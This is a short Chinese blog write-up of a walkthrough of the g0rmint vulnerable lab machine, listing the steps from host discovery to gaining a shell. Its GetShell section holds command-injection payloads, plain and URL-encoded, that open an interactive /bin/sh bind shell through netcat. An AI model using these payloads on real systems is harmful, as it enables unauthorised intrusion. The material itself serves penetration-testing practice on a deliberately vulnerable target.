靶机记录（五）：g0rmint

原创于 2021-10-29 17:27:18 发布 · 402 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#web渗透

本文探讨了黑客常用的攻击手段，包括主机发现、端口扫描、FTP渗透、Web漏洞挖掘、GetShell获取权限，以及关键步骤如清痕迹和设置后门。通过实例展示了技术流程和实用技巧，深入浅出地解析了每个阶段的操作。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

主机发现

端口扫描

FTP

Web渗透

目录扫描

漏洞挖掘

代码分析

从重置密码入手

看之前写入的一句话木马（登录状态下）

GetShell

依次执行：

HACK=`mkfifo /tmp/t`;
HACK=%60mkfifo%20%2ftmp%2ft%60%3B
 
HACK=`cat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t`;
HACK=%60cat%20%2ftmp%2ft%20%7C%20%2fbin%2fsh%20-i%202%3E%261%20%7C%20nc%20-l%208888%20%3E%20%2ftmp%2ft%60%3B

Hackbar 给我整个 500 的错人麻了

BP永远滴神